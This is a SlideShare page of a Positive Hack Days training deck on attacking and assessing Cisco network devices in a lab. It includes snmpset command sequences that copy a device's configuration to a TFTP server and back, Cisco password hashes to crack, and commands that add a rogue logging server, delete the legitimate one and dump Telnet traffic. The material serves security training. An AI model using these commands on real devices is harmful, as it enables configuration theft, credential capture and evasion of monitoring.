Master class « Analysis of network infrastructure security » Sergey Pavlov Positive  Technologies
Introduction
Laboratory work <ul><li>Scanning </li></ul><ul><li>SNMP default community strings </li></ul><ul><li>Management accounts fo...
Part  1.  Scanning <ul><li>Attacker always use scanning as a first step to collect available services </li></ul><ul><li>Th...
Practical task  (1) <ul><li>Start virtual machine </li></ul><ul><li>Scan a specified port of the network device via NMap s...
Part  2 :  SNMP default community strings
SNMPv1/2 <ul><li>Privileges in  SNMP </li></ul><ul><ul><li>Read-only –  this mode is used only to monitor the device, and ...
Copy configuration file via SNMP TFTP server snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integ...
Practical task  ( 2 ) <ul><li>Enable TFTP server </li></ul><ul><li>Bruteforce SNMP password </li></ul><ul><li>Copy configu...
Part  3.  Management accounts for  Telnet  and  SSH
Privilege types <ul><li>Default privileges </li></ul><ul><ul><li>User has limited privileges (level 1) to execute basic co...
User password types <ul><li>Without encryption </li></ul><ul><ul><li>username cisco password  0   cisco </li></ul></ul><ul...
Practical task  (3) <ul><li>Restore “admin” user password </li></ul><ul><li>Restore enable password </li></ul>
Part  4.  Network device default settings
Examples <ul><li>Often, device configuration includes default values. We do not notice them ,  but they exist ;) </li></ul...
Practical task  (4) <ul><li>Enter “AdMIn” instead of “admin” to login the device via Telnet </li></ul><ul><li>Login the de...
Part  5.  Event logging .  GOOD or BAD ?
<ul><li>Регистрация событий помогает: </li></ul><ul><ul><li>Искать неисправности в сети </li></ul></ul><ul><ul><li>Обнаруж...
Add new event logging server <ul><li>Add new server </li></ul><ul><ul><li>MC#conf t </li></ul></ul><ul><ul><li>MC(config)#...
Unable to catch traffic ?!  But if you really want ? …  You can <ul><ul><li>MC#conf t </li></ul></ul><ul><ul><li>MC(config...
Practical task  (5) <ul><li>Enable logging server </li></ul><ul><li>Add new logging server on a network device </li></ul><...
Part  6 .   VPN
Why do I need VPN ? <ul><li>Only boundary devices   are available from public networks without VPN. </li></ul><ul><li>VPN ...
VPN types <ul><li>GRE is a tunnel protocol that do not provide encryption .  Its main aim is to encapsulate network level ...
PPTP configuration example <ul><ul><ul><li>aaa new-model </li></ul></ul></ul><ul><ul><ul><li>aaa authentication ppp defaul...
Practical task  (6) <ul><li>Configure PPTP, connect to the device </li></ul><ul><li>Test if 1.1.1. 1  host is available </...
Summary
Summary <ul><li>Do not leave network devices without control, as if compromised, they allow attackers to manipulate the wh...
Additional data and links <ul><ul><li>SNMPv1/2 scanning </li></ul></ul><ul><ul><ul><li>SNSCAN </li></ul></ul></ul><ul><ul>...
Thank you for your attention ! [email_address]
Upcoming SlideShare
Loading in...5
×

Positive Hack Days. Pavlov. Network Infrastructure Security Assessment

1,580

Published on

A participant will acquire basic skills of searching for vulnerabilities on switches and routers from various vendors. The masterclass will cover both common network vulnerabilities, and exceptive cases that can be detected in the process of security assessment of real networks.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,580
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
42
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Do you see ground squirrel? Me too! But he exists!
  • User networks Internet Network hub
  • Positive Hack Days. Pavlov. Network Infrastructure Security Assessment

    1. 1. Master class « Analysis of network infrastructure security » Sergey Pavlov Positive Technologies
    2. 2. Introduction
    3. 3. Laboratory work <ul><li>Scanning </li></ul><ul><li>SNMP default community strings </li></ul><ul><li>Management accounts for Telnet and SSH </li></ul><ul><li>Network device default settings </li></ul><ul><li>Event logging </li></ul><ul><li>VPN </li></ul><ul><li>Summary </li></ul>
    4. 4. Part 1. Scanning <ul><li>Attacker always use scanning as a first step to collect available services </li></ul><ul><li>The information can be used to : </li></ul><ul><ul><li>bruteforce accounts and passwords </li></ul></ul><ul><ul><li>detect service versions </li></ul></ul>
    5. 5. Practical task (1) <ul><li>Start virtual machine </li></ul><ul><li>Scan a specified port of the network device via NMap software. </li></ul>
    6. 6. Part 2 : SNMP default community strings
    7. 7. SNMPv1/2 <ul><li>Privileges in SNMP </li></ul><ul><ul><li>Read-only – this mode is used only to monitor the device, and not to manage it . </li></ul></ul><ul><ul><li>Read-write is used for device monitoring and managing . </li></ul></ul><ul><li>Here is an example of SNMP community string bruteforce via SNSCAN utility (McAfee) : </li></ul>
    8. 8. Copy configuration file via SNMP TFTP server snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <TFTP server address >. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1 / // Copy file configuration ( starup-config) //back to the device snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <TFTP server address >. snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 //Device reload to apply changes
    9. 9. Practical task ( 2 ) <ul><li>Enable TFTP server </li></ul><ul><li>Bruteforce SNMP password </li></ul><ul><li>Copy configuration file to TFTP server </li></ul>
    10. 10. Part 3. Management accounts for Telnet and SSH
    11. 11. Privilege types <ul><li>Default privileges </li></ul><ul><ul><li>User has limited privileges (level 1) to execute basic commands </li></ul></ul><ul><li>High privileges </li></ul><ul><ul><li>« enable » ( level 15) password is needed to gain privileges on Cisco devices </li></ul></ul>
    12. 12. User password types <ul><li>Without encryption </li></ul><ul><ul><li>username cisco password 0 cisco </li></ul></ul><ul><li>Weak encryption </li></ul><ul><ul><li>username admin password 7 104F0D140C1953 </li></ul></ul><ul><ul><ul><ul><li>There are a number of utilities used for restoring, for example, Cain&Abel . Restoring takes split seconds . </li></ul></ul></ul></ul><ul><li>Password hash </li></ul><ul><ul><li>enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0 </li></ul></ul><ul><ul><ul><ul><li>Bruteforce is used for restoring via the following software : Cain&Abel , PasswordPro, John the Ripper, etc . Restoring time unpredictable period of time . </li></ul></ul></ul></ul>
    13. 13. Practical task (3) <ul><li>Restore “admin” user password </li></ul><ul><li>Restore enable password </li></ul>
    14. 14. Part 4. Network device default settings
    15. 15. Examples <ul><li>Often, device configuration includes default values. We do not notice them , but they exist ;) </li></ul><ul><ul><li>If aaa new-model is enabled, the following values are used : </li></ul></ul><ul><ul><ul><li>aaa authentication login default local – for vty </li></ul></ul></ul><ul><ul><ul><li>aaa authentication login default none – for con </li></ul></ul></ul><ul><ul><li>HTTP server does not depend on “AAA” service and uses “enable” password by default </li></ul></ul>
    16. 16. Practical task (4) <ul><li>Enter “AdMIn” instead of “admin” to login the device via Telnet </li></ul><ul><li>Login the device via HTTP using enable password only </li></ul><ul><li>Create new user via web interface </li></ul><ul><li>Check that new user can login via Telnet </li></ul>
    17. 17. Part 5. Event logging . GOOD or BAD ?
    18. 18. <ul><li>Регистрация событий помогает: </li></ul><ul><ul><li>Искать неисправности в сети </li></ul></ul><ul><ul><li>Обнаруживать попытки НСД </li></ul></ul><ul><ul><li>Контролировать изменения конфигураций, устройств </li></ul></ul><ul><li>НО ! Регистрация событий может играть и негативную роль: </li></ul><ul><ul><li>При добавлении нового сервера регистрации в конфигурацию, злоумышленник получает те же данные, что и администратор сети </li></ul></ul><ul><ul><li>Служба регистрации позволяет перехватить учетные записи и пароли пользователей в проходящем через устройство трафике </li></ul></ul>Функции регистрации событий
    19. 19. Add new event logging server <ul><li>Add new server </li></ul><ul><ul><li>MC#conf t </li></ul></ul><ul><ul><li>MC(config)#logging 192.168.123.4 </li></ul></ul><ul><li>Delete the others …. to prevent interference ;) </li></ul><ul><ul><li>MC#conf t </li></ul></ul><ul><ul><li>MC(config)#no logging 1.2.3.4 </li></ul></ul>
    20. 20. Unable to catch traffic ?! But if you really want ? … You can <ul><ul><li>MC#conf t </li></ul></ul><ul><ul><li>MC(config)#logging trap 7 </li></ul></ul><ul><ul><li>MC(config)#access-list 122 permit tcp any any eq telnet </li></ul></ul><ul><ul><li>MC(config)#end </li></ul></ul><ul><ul><li>MC#debug ip packet 122 detail dump </li></ul></ul><ul><li>New events are interesting but device traffic is also interesting, especially not-encrypted traffic . You can use You can use Cisco IOS undeclared features . </li></ul>
    21. 21. Practical task (5) <ul><li>Enable logging server </li></ul><ul><li>Add new logging server on a network device </li></ul><ul><li>Log Telnet service traffic </li></ul>
    22. 22. Part 6 . VPN
    23. 23. Why do I need VPN ? <ul><li>Only boundary devices are available from public networks without VPN. </li></ul><ul><li>VPN allows you to access services that are usually blocked by providers, for example, 445 /TCP. </li></ul><ul><li>Network devices do not support all popular services . For example, it is impossible to start RDP session from a mobile device . </li></ul>
    24. 24. VPN types <ul><li>GRE is a tunnel protocol that do not provide encryption . Its main aim is to encapsulate network level packets into IP packets. </li></ul><ul><li>L2TP is a tunnel protocol that do not provide encryption and confidentiality . It is based on an encapsulated protocol used to provide confidentiality . </li></ul><ul><li>PPTP is a tunnel protocol of PTP type . It allows to create tunnels for data exchange . </li></ul><ul><li>IPSEC allows you to confirm identity and/or to encrypt IP packets . </li></ul>
    25. 25. PPTP configuration example <ul><ul><ul><li>aaa new-model </li></ul></ul></ul><ul><ul><ul><li>aaa authentication ppp default local </li></ul></ul></ul><ul><ul><ul><li>vpdn enable </li></ul></ul></ul><ul><ul><ul><li>! </li></ul></ul></ul><ul><ul><ul><li>vpdn-group 1 </li></ul></ul></ul><ul><ul><ul><li>! Default PPTP VPDN group </li></ul></ul></ul><ul><ul><ul><li>accept-dialin </li></ul></ul></ul><ul><ul><ul><li>protocol pptp </li></ul></ul></ul><ul><ul><ul><li>virtual-template 1 </li></ul></ul></ul><ul><ul><ul><li>local name tunnel </li></ul></ul></ul><ul><ul><ul><li>! </li></ul></ul></ul><ul><ul><ul><li>interface Virtual-Template1 </li></ul></ul></ul><ul><ul><ul><li>ip unnumbered FastEthernet0/1 </li></ul></ul></ul><ul><ul><ul><li>ip mroute-cache </li></ul></ul></ul><ul><ul><ul><li>peer default ip address pool default </li></ul></ul></ul><ul><ul><ul><li>ppp encrypt mppe auto </li></ul></ul></ul><ul><ul><ul><li>ppp authentication ms-chap </li></ul></ul></ul><ul><ul><ul><li>! </li></ul></ul></ul><ul><ul><ul><li>ip local pool default 1.1.1.10 1.1.1.100 </li></ul></ul></ul>
    26. 26. Practical task (6) <ul><li>Configure PPTP, connect to the device </li></ul><ul><li>Test if 1.1.1. 1 host is available </li></ul>
    27. 27. Summary
    28. 28. Summary <ul><li>Do not leave network devices without control, as if compromised, they allow attackers to manipulate the whole network </li></ul><ul><li>Use best practices for network device security settings </li></ul><ul><li>Use complex network device protection </li></ul><ul><li>Keep monitoring of network security </li></ul>
    29. 29. Additional data and links <ul><ul><li>SNMPv1/2 scanning </li></ul></ul><ul><ul><ul><li>SNSCAN </li></ul></ul></ul><ul><ul><ul><li>Hydra </li></ul></ul></ul><ul><ul><li>Copy configuration via SNMP </li></ul></ul><ul><ul><li>PPTP configuration </li></ul></ul><ul><ul><li>BackTrack distribution kit </li></ul></ul>
    30. 30. Thank you for your attention ! [email_address]
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×